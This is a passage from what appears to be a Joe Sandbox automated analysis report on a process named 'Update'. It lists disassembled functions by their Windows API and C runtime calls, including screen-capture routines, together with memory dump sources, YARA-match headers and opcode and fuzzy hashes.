                                                                                                  • Part of subcall function 037FBC70: GetDesktopWindow.USER32 ref: 037FBC8F
                                                                                                  • Part of subcall function 037FBC70: GetDC.USER32(00000000), ref: 037FBC9C
                                                                                                  • Part of subcall function 037FBC70: CreateCompatibleDC.GDI32(00000000), ref: 037FBCA2
                                                                                                  • Part of subcall function 037FBC70: GetDC.USER32(00000000), ref: 037FBCAD
                                                                                                  • Part of subcall function 037FBC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 037FBCBA
                                                                                                  • Part of subcall function 037FBC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 037FBCC2
                                                                                                  • Part of subcall function 037FBC70: ReleaseDC.USER32(00000000,00000000), ref: 037FBCD3
                                                                                                  • Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004C), ref: 037FBD78
                                                                                                  • Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004D), ref: 037FBD8D
                                                                                                  • Part of subcall function 037FBC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 037FBDA6
                                                                                                  • Part of subcall function 037FBC70: SelectObject.GDI32(?,00000000), ref: 037FBDB4
                                                                                                  • Part of subcall function 037FBC70: SetStretchBltMode.GDI32(?,00000003), ref: 037FBDC0
                                                                                                  • Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004F), ref: 037FBDCD
                                                                                                  • Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004E), ref: 037FBDE0
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • _memset.LIBCMT ref: 037FB1E1
                                                                                                • swprintf.LIBCMT ref: 037FB204
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                • String ID: %s %s
                                                                                                • API String ID: 1028806752-581060391
                                                                                                • Opcode ID: 20b1a142c5ada7b0a398fe28db596add813da2de8d32daade796057b0431cb9f
                                                                                                • Instruction ID: b42dc752cdb52b4bd1322eddd818a95bc2dbb08ad1eb89ed57130cf26e797396
                                                                                                • Opcode Fuzzy Hash: 20b1a142c5ada7b0a398fe28db596add813da2de8d32daade796057b0431cb9f
                                                                                                • Instruction Fuzzy Hash: 0D21E1B6A04340AFD210EF58DC84E5FB7E8BFD9710F08056EF9899A301EA60D914C7A3
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F9115
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
                                                                                                  • Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F9128
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                • String ID: string too long
                                                                                                • API String ID: 963545896-2556327735
                                                                                                • Opcode ID: a3fe3bb755f92e2a6cf6817ff0a750902d609b77223eee2fd13c948867f4df4a
                                                                                                • Instruction ID: c89c2c912b9efc3c80c421e884edcb73882ddf0faa9f0f48e727039728206b29
                                                                                                • Opcode Fuzzy Hash: a3fe3bb755f92e2a6cf6817ff0a750902d609b77223eee2fd13c948867f4df4a
                                                                                                • Instruction Fuzzy Hash: 911190763043408FC321DA6CE804B1AB7E9BBE7A21F140A7AE391CB751C772D804C7A5
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBCMT ref: 037F941D
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F944A
                                                                                                Strings
                                                                                                • invalid string position, xrefs: 037F9445
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 3614006799-1799206989
                                                                                                • Opcode ID: 386563a5db77daf5524b33ba6f01ae2bfe94c27575d442e1e2dd18123550b18f
                                                                                                • Instruction ID: 599eb2dcedae495875754d7b92e1eb374b43d3302857985a7f906a583fbba1b1
                                                                                                • Opcode Fuzzy Hash: 386563a5db77daf5524b33ba6f01ae2bfe94c27575d442e1e2dd18123550b18f
                                                                                                • Instruction Fuzzy Hash: 4D01F7336003045FD324EE6CD8847AAF799BB52620F140A69E7529F7C1D771EA44C791
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E1AC2
                                                                                                • ___raise_securityfailure.LIBCMT ref: 006E1BAA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                • String ID: 0n
                                                                                                • API String ID: 3761405300-2440949296
                                                                                                • Opcode ID: 87c7b767ba9a582c09c99674da6209699803d8c6c166f925a227a08dceb1bbdf
                                                                                                • Instruction ID: fb9dacd26d84d7198d7dd826fb88649d989cb9f254ac86e02525db9daf4cdd0d
                                                                                                • Opcode Fuzzy Hash: 87c7b767ba9a582c09c99674da6209699803d8c6c166f925a227a08dceb1bbdf
                                                                                                • Instruction Fuzzy Hash: E221B7B56013A19AD714CF16E9CEA907BA6BB09314F20606EE9058F3A0E7B197848F45
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F957F
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
                                                                                                  • Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
                                                                                                  • Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1
                                                                                                • _memmove.LIBCMT ref: 037F95B5
                                                                                                Strings
                                                                                                • invalid string position, xrefs: 037F957A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1785806476-1799206989
                                                                                                • Opcode ID: 38981ae2e53f40f4a189f1df440cf80ccc094a92422955787a5ea2a1635d373d
                                                                                                • Instruction ID: 4c06410381b9e38321ff6c47fcee61ce89af0aa8b12afcb0ae4c48dbede81b92
                                                                                                • Opcode Fuzzy Hash: 38981ae2e53f40f4a189f1df440cf80ccc094a92422955787a5ea2a1635d373d
                                                                                                • Instruction Fuzzy Hash: F8014F317047018FD725CA6CED9472AB3E7BBC65047284A68D391CBB8AD7B1DC424794
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037FD1D4
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
                                                                                                  • Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74
                                                                                                • _memmove.LIBCMT ref: 037FD20D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1785806476-3788999226
                                                                                                • Opcode ID: d1105f5b6772a292dc272288e6085a165a3283242092e1bf0665be865d974a8c
                                                                                                • Instruction ID: 5e35f6a5964b18d98158d824609c21d7147ba37cf10d87995ff3bee70ad21d59
                                                                                                • Opcode Fuzzy Hash: d1105f5b6772a292dc272288e6085a165a3283242092e1bf0665be865d974a8c
                                                                                                • Instruction Fuzzy Hash: 0801DD7A9006059FCB20FE6DEC99C2E77D8F6603513698279DD21C375CE770E8148790
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F8443
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
                                                                                                  • Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
                                                                                                  • Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74
                                                                                                • _memmove.LIBCMT ref: 037F846E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1785806476-3788999226
                                                                                                • Opcode ID: c19e0a5ee637c081274dca715d8c0c2d1d0558e93e86a2c4fa25b7afae6bdd1e
                                                                                                • Instruction ID: 423a574c533bd41038014fe012da5701226ad87986f886cd29e41acd680badd6
                                                                                                • Opcode Fuzzy Hash: c19e0a5ee637c081274dca715d8c0c2d1d0558e93e86a2c4fa25b7afae6bdd1e
                                                                                                • Instruction Fuzzy Hash: C201A2B160030A9FCB24DFA8DC9593BB3E8FF542103184A2DE956CB750E630F800C761
                                                                                                APIs
                                                                                                  • Part of subcall function 0381010A: __getptd.LIBCMT ref: 03810110
                                                                                                  • Part of subcall function 0381010A: __getptd.LIBCMT ref: 03810120
                                                                                                • __getptd.LIBCMT ref: 038106E3
                                                                                                  • Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
                                                                                                  • Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B
                                                                                                • __getptd.LIBCMT ref: 038106F1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: csm
                                                                                                • API String ID: 803148776-1018135373
                                                                                                • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                • Instruction ID: be453f9734491b2ad22c8d9bb62e4b085e564c382051b697cc9c999ac4e38013
                                                                                                • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                • Instruction Fuzzy Hash: 880128BA8003058ECF35DFE5D8846ADB7BDAF04211F6849AED059DA690DB3295E1CE42
                                                                                                APIs
                                                                                                  • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132B4
                                                                                                  • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132C4
                                                                                                • __getptd.LIBCMT ref: 100137D8
                                                                                                  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                                                  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                                                • __getptd.LIBCMT ref: 100137E6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                • String ID: csm
                                                                                                • API String ID: 803148776-1018135373
                                                                                                • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                • Instruction ID: 7ab74b7057de6af6c41b09604486a57fd509075c87a44dfcf8772f30d13ae725
                                                                                                • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                • Instruction Fuzzy Hash: 2001283A8013468FDB24DF26C44069CB3F6FF00651F51842DF4955A6A1CF34EAD1CA11